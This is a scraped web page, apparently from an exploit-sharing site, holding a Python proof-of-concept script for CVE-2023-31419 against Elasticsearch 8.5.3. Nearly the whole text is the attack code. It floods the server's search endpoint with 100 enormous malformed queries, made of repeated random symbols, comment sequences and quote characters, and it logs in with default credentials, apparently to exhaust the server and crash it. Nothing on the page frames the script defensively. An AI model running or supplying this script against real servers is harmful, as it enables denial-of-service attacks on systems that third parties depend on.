扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
# Exploit Author: TOUHAMI KASBAOUI # Vendor Homepage: https://elastic.co/ # Version: 8.5.3 / OpenSearch # Tested on: Ubuntu 20.04 LTS # CVE : CVE-2023-31419 # Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419 import requests import random import string es_url = 'http://localhost:9200'# Replace with your Elasticsearch server URL index_name = '*' payload = "/*" * 10000 + "\\" +"'" * 999 verify_ssl = False username = 'elastic' password = 'changeme' auth = (username, password) num_queries = 100 for _ in range(num_queries): symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000)) search_query = { "query": { "match": { "message": (symbols * 9000) + payload } } } print(f"Query {_ + 1} - Search Query:") search_endpoint = f'{es_url}/{index_name}/_search' response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth) if response.status_code == 200: search_results = response.json() print(f"Query {_ + 1} - Response:") print(search_results) total_hits = search_results['hits']['total']['value'] print(f"Query {_ + 1}: Total hits: {total_hits}") for hit in search_results['hits']['hits']: source_data = hit['_source'] print("Payload result: {search_results}") else: print(f"Error for query {_ + 1}: {response.status_code} - {response.text}") |
体验盒子
